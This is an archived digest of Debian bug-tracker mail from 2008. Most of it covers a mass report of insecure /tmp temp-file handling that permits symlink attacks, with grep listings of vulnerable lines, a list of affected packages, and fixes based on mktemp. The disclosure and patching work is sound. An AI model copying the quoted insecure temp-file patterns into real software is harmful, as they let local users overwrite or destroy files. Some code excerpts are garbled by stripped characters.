PROTECTED] Pisa, Italy Web: http://giomasce.altervista.org SIP: [EMAIL PROTECTED] Jabber: [EMAIL PROTECTED] / [EMAIL PROTECTED] GPG: 0x5F1FBF70 (FP: 1EB6 3D43 E201 4DDF 67BD 003F FCB0 BB5C 5F1F BF70) signature.asc Description: Questa è una parte del messaggio firmata digitalmente ---End Message--- ---BeginMessage--- Source: man-pages-it Source-Version: 2.80-3 We believe that the bug you reported is fixed in the latest version of man-pages-it, which is due to be installed in the Debian FTP archive: man-pages-it_2.80-3.diff.gz to pool/main/m/man-pages-it/man-pages-it_2.80-3.diff.gz man-pages-it_2.80-3.dsc to pool/main/m/man-pages-it/man-pages-it_2.80-3.dsc manpages-it_2.80-3_all.deb to pool/main/m/man-pages-it/manpages-it_2.80-3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Francesco Paolo Lovergine [EMAIL PROTECTED] (supplier of updated man-pages-it package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 12:56:34 +0200 Source: man-pages-it Binary: manpages-it Architecture: source all Version: 2.80-3 Distribution: unstable Urgency: low Maintainer: Francesco Paolo Lovergine [EMAIL PROTECTED] Changed-By: Francesco Paolo Lovergine [EMAIL PROTECTED] Description: manpages-it - Italian version of the manual pages Closes: 493883 Changes: man-pages-it (2.80-3) unstable; urgency=low . * Removed duplicated man2html.1 (closes: #493883) Checksums-Sha1: 564e76fdc208ae3594f387cef8030d8bf5b93d0b 1046 man-pages-it_2.80-3.dsc 469a8f510195f29079db933c164f5b8cd3f14a0a 4268 man-pages-it_2.80-3.diff.gz 49ca846a46a5b158515fdbd9eba613490d3049ee 496158 manpages-it_2.80-3_all.deb Checksums-Sha256: ba2c1a614363a76e716f6df610446871aaf8313e4b55896cc3eab01745cbaddb 1046 man-pages-it_2.80-3.dsc c00f0dc137ec1eb1eab1b4fc1166a49cb7d37a6b96af0778ab0a7390d3ad5d2a 4268 man-pages-it_2.80-3.diff.gz 0664b7925558ecbbd92b0f215f1e8b48ec0c73a072c68755ba3acda72e8c6473 496158 manpages-it_2.80-3_all.deb
Bug#471404: Wouldn't a 32bit bin86 be usefull?
Hi, wouldn't it make sense to compile bin86 with -m32 on amd64? People might still want to build 16bit code for example for a boot loader. MfG Goswin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#332782: Release Notes: license clarification
On Tue, Aug 26, 2008 at 09:58:25PM +0200, Josip Rodin wrote: On Tue, Aug 26, 2008 at 07:26:38PM +0200, Luk Claes wrote: But, in such an (unlikely) court battle the onus would be on them to prove that the stuff they committed was both copyrightable in the first place as well as not infringing on previous work (which they apparently didn't have any license to modify). Nope, without a license the contributor could ask for compensation per copy that was distributed if the court would agree that he has copyright on it and we didn't have permission to distribute it (which is not far fetched at all without having a license...). As I said above... they could hardly claim copyright on modifications which they made without a license. Also, there is no direct damadge made to the contributor too. Compensation is for something they have fair claim. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: newsbeuter installability
Processing commands for [EMAIL PROTECTED]: # libmrss0 is not installable; can be fixed by rebuild from source severity 496774 serious Bug#496774: libmrss0: depends on a nonexistent package Severity set to `serious' from `normal' # newsbeuter has been built against the problematic libmrss0 severity 496772 serious Bug#496772: newsbeuter: depends on a nonexistent package Severity set to `serious' from `normal' block 496772 by 496774 Bug#496774: libmrss0: depends on a nonexistent package Bug#496772: newsbeuter: depends on a nonexistent package Was not blocked by any bugs. Blocking bugs of 496772 added: 496774 thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496363: The possibility of attack with the help of symlinks in some Debian packages
Hi Dirk, On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote: Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX, ... and even Windoze (though the javareconf script may not matter there). But I just emailed the point person for javareconf. Maybe we can move creation of the temp.dir into a helper function which use mktemp if present and default to what it currently does. New version with patched javareconf now uploaded. I see an upload of r-base-core but not (yet) of r-base-core-ra, is that intentional? cheers, Thijs pgpBLU1b6TBVn.pgp Description: PGP signature
Processed: confirmed, let's remove it instead
Processing commands for [EMAIL PROTECTED]: tags 496437 confirmed Bug#496437: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496437: confirmed, let's remove it instead
tags 496437 confirmed thanks I confirmed that the package is full of insecure temp files. However given that it's orphaned and has several problems, I'm asking for removal from unstable. Thijs pgp3m15STSoXo.pgp Description: PGP signature
Bug#496357: opensync-plugin-palm: Impossible to install the package
On Sun, Aug 24, 2008 at 08:04:44PM +0200, nb wrote: When I try to install the package, I have the following error : Package: opensync-plugin-palm [...] Sorry, but that's no error, that's the apt-cache output. Can you please post the error you get? thanks, Michael -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496363: The possibility of attack with the help of symlinks in some Debian packages
Hi Thijs, On 27 August 2008 at 13:57, Thijs Kinkhorst wrote: | Hi Dirk, | | On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote: | Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX, | ... and even Windoze (though the javareconf script may not matter there). | | But I just emailed the point person for javareconf. Maybe we can move | creation of the temp.dir into a helper function which use mktemp if present | and default to what it currently does. | | New version with patched javareconf now uploaded. | | I see an upload of r-base-core but not (yet) of r-base-core-ra, is that | intentional? It was. R 2.7.2 came out on Monday, so r-base-core was a natural candidate. Yesterday I worked on the RC bug requiring GSL docs to go to non-free for dfsg / gfdl reasons. So for r-base-core-ra, a build will follow shortly. There will be a new release too (corresponding to R 2.7.2), but as we don't know when I'll just preempt it with a new build with a patched javareconf. Hth, Dirk -- Three out of two people have difficulties with fractions. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: confirmed to be present
Processing commands for [EMAIL PROTECTED]: tags 496427 confirmed Bug#496427: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496427: confirmed to be present
tags 496427 confirmed thanks Indeed present, a simple grep yields a number of different results already, see below. As the code contains many instances of different things written to /tmp, it may make sense to resolve that by creating one private working dir securely, and then prefixing that path to all uses of /tmp. Thijs ./lmbench-3.0-a7/src/bench.h:97:#define UNIX_CONTROL/tmp/lmbench.ctl ./lmbench-3.0-a7/src/bench.h:98:#define UNIX_DATA /tmp/lmbench.data ./lmbench-3.0-a7/src/bench.h:99:#define UNIX_LAT/tmp/lmbench.lat ./lmbench-3.0-a7/src/rhttp.c:81: sprintf(name, /tmp/rhttp%d, i); ./lmbench-3.0-a7/src/rhttp.c:96:system(cat /tmp/rhttp*; rm /tmp/rhttp*); ./lmbench-3.0-a7/src/rhttp.c:106: sprintf(buf, /tmp/http%d, i); ./lmbench-3.0-a7/src/lat_fcntl.c:105: sprintf(state-filename1, /tmp/lmbench-fcntl%d.1, getpid()); ./lmbench-3.0-a7/src/lat_fcntl.c:106: sprintf(state-filename2, /tmp/lmbench-fcntl%d.2, getpid()); ./lmbench-3.0-a7/src/lat_unix_connect.c:18:#define CONNAME /tmp/af_unix ./lmbench-3.0-a7/src/lat_fifo.c:15:#define F1 /tmp/lmbench_f1.%d ./lmbench-3.0-a7/src/lat_fifo.c:16:#define F2 /tmp/lmbench_f2.%d ./lmbench-3.0-a7/src/lat_proc.c:20:#define PROG /tmp/hello-s ./lmbench-3.0-a7/src/lat_proc.c:23:#define PROG /tmp/hello ./lmbench-3.0-a7/src/lmhttp.c:23:#define LOGFILE /usr/tmp/lmhttp.log ./lmbench-3.0-a7/scripts/SHIT:594: system co -q -p -kkvl $rev $_[$i] /tmp/sdiff.$$ . ./lmbench-3.0-a7/scripts/SHIT:595: $diff /tmp/sdiff.$$ $working[$i]; ./lmbench-3.0-a7/scripts/SHIT:597: unlink(/tmp/sdiff. $$);./lmbench-3.0-a7/scripts/rccs:603: system co -q -p -kkvl $rev $_[$i] /tmp/sdiff.$$ . ./lmbench-3.0-a7/scripts/rccs:604: $diff /tmp/sdiff.$$ $working[$i]; ./lmbench-3.0-a7/scripts/rccs:606: unlink(/tmp/sdiff. $$); pgpVOL44hMGMk.pgp Description: PGP signature
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
Hello Dmitry, Thanks for your test, but atm I've some problems to fix this issue for lustre- tests In some packages I've discovered scripts with errors which may be used by a user for damaging important system files or user's files. For example if a script uses in its work a temp file which is created in /tmp directory, then every user can create symlink with the same name in this directory in order to destroy or rewrite some system or user file. Symlink attack may also lead not only to the data desctruction but to denial of service as well. Btw: lustre-tests is a package which contains only binaries for debugging lustre, and is therefore only needed on very very few systems. But nevertheless this should be fixed. I guess the part which is critical is this one: ---snip-- while date; do LOOP=`expr $LOOP + 1` echo Test #$LOOP iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 21 || exit $? [ -f endiozone -o $LOOP -ge $COUNT ] rm -f endiozone exit 0 done | tee /tmp/iozone.log snap This small script creates a log of the iozone run in /tmp without checking if this file exists there. Do you have any hints how to fix this issue? Greetings Winnie signature.asc Description: This is a digitally signed message part.
Bug#496433: this is indeed present
tags 496433 confirmed thanks Hi, Indeed, several times the file /tmp/audiolink.db.tmp gets used in code/audiolink. This is probably easily fixable through using the Perl::Temp module and its mktemp() funtion to create a secure file once, (re)use that on the several needed occasions and remove it after. cheers, Thijs pgpzxziwnumS3.pgp Description: PGP signature
Bug#481134: Please hint poppler-data for lenny inclusion
On Sun, 24 Aug 2008 08:32:21 +0200 Christian Perrier [EMAIL PROTECTED] wrote: Also don't forget about suggesting to add it to the CJK languages -desktop tasks in tasksel, if it is that important. I think that non-free packages can be added there... That's very very helpful for our users! If not, users must edit their apt lines by hand, and know this poppler-data package is needed to view PDF files, it's painful thing for average users (Yes, I can do that easily, and you can also do that, but your mother, father, little brother or sister probably can't do that). Our priorities are our users and free software - yeah, you know that, users are important for us :) (not only free software) So I and other Japanese Debian developer/maintainer/package maintainer/ users want poppler-data package to there, the CJK languages-desktop tasks in tasksel. Please consider that. -- Regards, Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp http://wiki.debian.org/HidekiYamane -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: this is indeed present
Processing commands for [EMAIL PROTECTED]: tags 496433 confirmed Bug#496433: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496419: issue is present, code runs as root
tags 496419 confirmed
thanks
Hi,
A simple grep revealed a lot of tempfile issues here, see below. As far as I
understand it, the code runs as root. This makes the issue quite serious.
Please make sure this is fixed before lenny is released.
As several different temp files are used insecurely, it may be better to
create a separate, private working directory for the program where it may
store all those files at will.
cheers,
Thijs
./config-scripts/xen-3.2/configure-xend.sh:cat EOF /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:$OPENSSL req -new -key
$KEY -out $CSR /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:rm /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:cat EOF /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:$OPENSSL req -new -key
$KEY -out $CSR /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:rm /tmp/open_ssl.res
./src/utils.py:updates_file = /tmp/updates.xml
./src/utils.py:
dir=/tmp)
./src/utils.py:TEST_CONFIGFILE = '/tmp/convirt.conf'
./src/XenNode.py:dom_config.save(/tmp/test_config)
./src/XenNode.py:newcfg.set_filename(/tmp/Txx)
./src/XenNode.py:f = managed_node.node_proxy.open(/tmp/Txx)
./src/XenNode.py:print ### read config from /etc/xen/auto and write them
to /tmp
./src/XenNode.py:d.save(/tmp/ + f)
./src/NodeProxy.py:node.put(/tmp/send, /tmp/send_r)
./src/NodeProxy.py:node.get(/tmp/send_r, /tmp/received)
./src/NodeProxy.py:fd = node.open('/tmp/test_writable','w')
./src/NodeProxy.py:
print 'exists?: ',node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:print 'isWritable?: ',
node.file_is_writable('/tmp/test_writable')
./src/NodeProxy.py:node.remove('/tmp/test_writable')
./src/NodeProxy.py:print 'exists?: ',
node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:node.mkdir(/tmp/node_test)
./src/NodeProxy.py:w = node.open(/tmp/node_test/test, w)
./src/NodeProxy.py:r = node.open(/tmp/node_test/test)
./src/NodeProxy.py:node.remove(/tmp/node_test/test)
./src/NodeProxy.py:node.rmdir(/tmp/node_test)
./src/NodeProxy.py:output,code = node.exec_cmd('find /tmp')
./src/NodeProxy.py:output,code = node.exec_cmd('junk /tmp')
./src/GridManager.py:
dir=/tmp)
./src/KVMProxy.py:cmdline = cmdline + -monitor unix:/tmp/ +
config.get(name) + \
./src/KVMProxy.py:config[monitor] = unix:/tmp/xyz
pgpOUGC4hsyzQ.pgp
Description: PGP signature
Processed: issue is present, code runs as root
Processing commands for [EMAIL PROTECTED]: tags 496419 confirmed Bug#496419: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#481134: Please hint poppler-data for lenny inclusion
On Sun, 24 Aug 2008 19:45:13 +0200 Luk Claes [EMAIL PROTECTED] wrote: unblocked Great thanks Luk! But, verrry sooorry, I've updated this poppler-data package before read this mail... changelog is below, 1 bug fix and trivial changes. poppler-data (0.2.0-2) unstable; urgency=low * debian/control - add DM-Upload-Allowed: yes, because I'm DM :) - fix poppler-data should suggest libpoppler3 (Closes: #496268) - change Priority: optional from extra, same as cmap-adobe-* - add some descriptions for cmap-adobe-* users so, please unblock this again, please... I am terribly sorry about the inconvenience. -- Regards, Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp http://wiki.debian.org/HidekiYamane -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496582: gnome-app-install: Application hangs while searching for a package
reassign 496582 librsvg2-2 2.22.2-2 severity 496582 important Am Mittwoch, den 27.08.2008, 00:13 +0200 schrieb Jose Pablo Ferrero: The problem occurs when showing some icons (i.e. elisa.svg). Trying to open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause a segmentation fault, but with epiphany, iceweasel or svgdisplay there isn't any problem. I'm not sure where the problem could be, but because this is not a gnome-install-app bug, please close it. This seems to be a bug in librsvg. Many applications crash with this file, including eog and rsvg-view. signature.asc Description: Dies ist ein digital signierter Nachrichtenteil
Processed (with 5 errors): Re: Bug#496582: gnome-app-install: Application hangs while searching for a package
Processing commands for [EMAIL PROTECTED]: reassign 496582 librsvg2-2 2.22.2-2 Bug#496582: gnome-app-install: Application hangs while searching for a package Bug reassigned from package `gnome-app-install' to `librsvg2-2'. severity 496582 important Bug#496582: gnome-app-install: Application hangs while searching for a package Severity set to `important' from `grave' Am Mittwoch, den 27.08.2008, 00:13 +0200 schrieb Jose Pablo Ferrero: Unknown command or malformed arguments to command. The problem occurs when showing some icons (i.e. elisa.svg). Trying to Unknown command or malformed arguments to command. open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause Unknown command or malformed arguments to command. a segmentation fault, but with epiphany, iceweasel or svgdisplay there Unknown command or malformed arguments to command. isn't any problem. I'm not sure where the problem could be, but because Unknown command or malformed arguments to command. Too many unknown commands, stopping here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: retitle 494468 to Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.33 retitle 494468 Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen Bug#494468: locales: Postist violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen Changed Bug title to `Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen' from `locales: Postist violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen'. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
This one time, at band camp, Patrick Winnertz said: I guess the part which is critical is this one: tmpfile=$(mktemp /tmp/iozone.XX) ---snip-- while date; do LOOP=`expr $LOOP + 1` echo Test #$LOOP iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 21 || exit $? [ -f endiozone -o $LOOP -ge $COUNT ] rm -f endiozone exit 0 snap done | tee $tmpfile -- - | ,''`.Stephen Gran | | : :' :[EMAIL PROTECTED] | | `. `'Debian user, admin, and developer | |`- http://www.debian.org | - signature.asc Description: Digital signature
Bug#496363: marked as done (The possibility of attack with the help of symlinks in some Debian packages)
Your message dated Wed, 27 Aug 2008 13:02:13 + with message-id [EMAIL PROTECTED] and subject line Bug#496363: fixed in r-base-core-ra 1.1.1-2 has caused the Debian Bug report #496363, regarding The possibility of attack with the help of symlinks in some Debian packages to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496363: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496363 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: r-base-core-ra Severity: grave Hi, maintainer! This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested. In some packages I've discovered scripts with errors which may be used by a user for damaging important system files or user's files. For example if a script uses in its work a temp file which is created in /tmp directory, then every user can create symlink with the same name in this directory in order to destroy or rewrite some system or user file. Symlink attack may also lead not only to the data desctruction but to denial of service as well. Even if you create files or directories with help of function 'RANDOM' or pid(), then your system is not protected. Attacker can create many symlinks in order to destroy your data or create 'denial of service' for your package scripts. Even if you make rm(dir) for files/directories, then your system is not protected. Attacker can permanently create symlinks. This list is created with the help of script. This list is sorted by hand. Howewer in some cases mistake is possible. Please, Be understanding to possible mistakes. :) I set Severity into grave for this bug. The table of discovered problems is below. Discussion of this bug you can see in debian-devel@: http://lists.debian.org/debian-devel/2008/08/msg00271.html Binary-package: r-base-core-ra (1.1.1-1) file: /usr/lib/Ra/lib/R/bin/javareconf Binary-package: rccp (0.9-2) file: /usr/lib/rccp/delqueueask Binary-package: mafft (6.240-1) file: /usr/bin/mafft-homologs Binary-package: openoffice.org-common (1:2.4.1-6) file: /usr/lib/openoffice/program/senddoc Binary-package: crossfire-maps (1.11.0-1) file: /usr/share/games/crossfire/maps/Info/combine.pl Binary-package: sgml2x (1.0.0-11.1) file: /usr/bin/rlatex Binary-package: liguidsoap (0.3.6-4) file: /var/lib/liguidsoap/liguidsoap.py Binary-package: citadel-server (7.37-1) file: /usr/lib/citadel-server/migrate_aliases.sh Binary-package: ampache (3.4.1-1) file: /usr/share/ampache/www/locale/base/gather-messages.sh Binary-package: xen-utils-3.2-1 (3.2.1-2) file: /usr/lib/xen-3.2-1/bin/qemu-dm.debug Binary-package: dtc-common (0.29.6-1) file: /usr/share/dtc/admin/accesslog.php file: /usr/share/dtc/admin/sa-wrapper Binary-package: honeyd-common (1.5c-3) file: /usr/share/honeyd/scripts/test.sh Binary-package: lustre-tests (1.6.5-1) file: /usr/lib/lustre/tests/runiozone Binary-package: linuxtrade (3.65-8+b4) file: /usr/share/linuxtrade/bin/linuxtrade.bwkvol file: /usr/share/linuxtrade/bin/linuxtrade.wn file: /usr/share/linuxtrade/bin/moneyam.helper Binary-package: freevo (1.8.1-0) file: /usr/bin/freevo.real Binary-package: fml (4.0.3.dfsg-2) file: /usr/share/fml/libexec/mead.pl Binary-package: rkhunter (1.3.2-3) file: /usr/bin/rkhunter Binary-package: openswan (1:2.4.12+dfsg-1.1) file: /usr/lib/ipsec/livetest Binary-package: linux-patch-openswan (1:2.4.12+dfsg-1.1) file: /usr/src/kernel-patches/all/openswan/packaging/utils/maysnap file: /usr/src/kernel-patches/all/openswan/packaging/utils/maytest Binary-package: aptoncd (0.1-1.1) file: /usr/share/aptoncd/xmlfile.py Binary-package: cdcontrol (1.90-1.1) file: /usr/lib/cdcontrol/writtercontrol Binary-package: newsgate (1.6-23) file: /usr/bin/mkmailpost Binary-package: gpsdrive-scripts (2.10~pre4-3) file: /usr/bin/geo-code Binary-package: impose+ (0.2-11) file: /usr/bin/impose Binary-package: mgt (2.31-5) file: /usr/games/mailgo Binary-package: audiolink (0.05-1) file: /usr/bin/audiolink Binary-package: ibackup (2.27-4.1) file: /usr/bin/ibackup Binary-package: emacspeak (26.0-3) file: /usr/share/emacs/site-lisp/emacspeak/etc/extract-table.pl Binary-package: bk2site (1:1.1.9-3.1) file: /usr/lib/cgi-bin/bk2site/redirect.pl Binary-package: datafreedom-perl (0.1.7-1) file: /usr/bin/dfxml-invoice Binary-package: emacs-jabber (0.7.91-1) file:
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
SG tmpfile=$(mktemp /tmp/iozone.XX) use 'mktemp -t iozone.XX' instead 'mktemp /tmp/iozone.XX' -- ... mpd paused: Manowar - Gloves of Metal . ''`. Dmitry E. Oboukhov : :’ : [EMAIL PROTECTED] `. `~’ GPGKey: 1024D / F8E26537 2006-11-21 `- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537 signature.asc Description: Digital signature
Processed: your mail
Processing commands for [EMAIL PROTECTED]: forwarded 496414 http://bugzilla.scilab.org/show_bug.cgi?id=3409 Bug#496414: The possibility of attack with the help of symlinks in some Debian packages Noted your statement that Bug has been forwarded to http://bugzilla.scilab.org/show_bug.cgi?id=3409. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#483337: intent to NMU
Hi,
a patch to fix this is attached and archived on:
http://people.debian.org/~nion/nmu-diff/mt-daapd-0.9~r1696-1.3_0.9~r1696-1.4.patch
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -u mt-daapd-0.9~r1696/debian/changelog mt-daapd-0.9~r1696/debian/changelog
--- mt-daapd-0.9~r1696/debian/changelog
+++ mt-daapd-0.9~r1696/debian/changelog
@@ -1,3 +1,11 @@
+mt-daapd (0.9~r1696-1.4) unstable; urgency=low
+
+ * Fix authentication upstream patch checking for a wrong return value
+(03_fix-authentication.dpatch; Closes: #496217).
+ * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337)
+
+ -- Nico Golde [EMAIL PROTECTED] Wed, 27 Aug 2008 14:53:45 +0200
+
mt-daapd (0.9~r1696-1.3) unstable; urgency=high
* Non-maintainer upload by the Security Team.
diff -u mt-daapd-0.9~r1696/debian/patches/00list mt-daapd-0.9~r1696/debian/patches/00list
--- mt-daapd-0.9~r1696/debian/patches/00list
+++ mt-daapd-0.9~r1696/debian/patches/00list
@@ -2,0 +3,2 @@
+03_fix-authentication
+04_taglib_api_calls
only in patch2:
unchanged:
--- mt-daapd-0.9~r1696.orig/debian/patches/04_taglib_api_calls.dpatch
+++ mt-daapd-0.9~r1696/debian/patches/04_taglib_api_calls.dpatch
@@ -0,0 +1,47 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 04_taglib_api_calls.dpatch by Nico Golde [EMAIL PROTECTED]
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: No description.
+
[EMAIL PROTECTED]@
+diff -urNad mt-daapd-0.9~r1696~/src/scan-mpc.c mt-daapd-0.9~r1696/src/scan-mpc.c
+--- mt-daapd-0.9~r1696~/src/scan-mpc.c 2007-08-10 06:07:26.0 +0200
mt-daapd-0.9~r1696/src/scan-mpc.c 2008-08-27 14:53:27.0 +0200
+@@ -70,31 +70,31 @@
+ len = strlen(val);
+ if ((pmp3-title = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-title, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_artist(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-artist = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-artist, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_album(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-album = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-album, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_comment(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-comment = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-comment, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_genre(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-genre = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-genre, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+
+ if ((i = taglib_tag_year(tag)) != 0)
only in patch2:
unchanged:
--- mt-daapd-0.9~r1696.orig/debian/patches/03_fix-authentication.dpatch
+++ mt-daapd-0.9~r1696/debian/patches/03_fix-authentication.dpatch
@@ -0,0 +1,19 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix-authentication.dpatch by Nico Golde [EMAIL PROTECTED]
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: No description.
+
[EMAIL PROTECTED]@
+diff -urNad mt-daapd-0.9~r1696~/src/webserver.c mt-daapd-0.9~r1696/src/webserver.c
+--- mt-daapd-0.9~r1696~/src/webserver.c 2007-10-22 05:40:29.0 +0200
mt-daapd-0.9~r1696/src/webserver.c 2008-08-27 14:49:35.0 +0200
+@@ -1131,7 +1131,7 @@
+ if((auth_handler) (auth_handler(pwsc,NULL,NULL)==0)) {
+ /* do the auth thing */
+ auth=ws_getarg(pwsc-request_headers,Authorization);
+-if((auth) (ws_decodepassword(auth,username, password))) {
++if((auth) (0 == ws_decodepassword(auth,username, password))) {
+ if(auth_handler(pwsc,username,password))
+ can_dispatch=1;
+ ws_addarg(pwsc-request_vars,HTTP_USER,%s,username);
pgpah3i2XxugH.pgp
Description: PGP signature
Processed: reassign 496774 to newsbeuter
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.35 reassign 496774 newsbeuter Bug#496774: libmrss0: depends on a nonexistent package Bug reassigned from package `libmrss0' to `newsbeuter'. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496772: newsbeuter: depends on a nonexistent package
Hi Riccardo, * Riccardo Stagni [EMAIL PROTECTED] [2008-08-27 13:53]: [...] (I filed a similar bugreport against libmrss0. If you think it's a fault in libnxml, please reassign/merge as appropriate) I reassigned this one back to newsbeuter as it is only newsbeuters fault calling libnxml-depends and libmrss-depends in the rules file. A fix is on its way. Cheers Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgprFy7F6O5k9.pgp Description: PGP signature
Bug#482140: (pas de sujet)
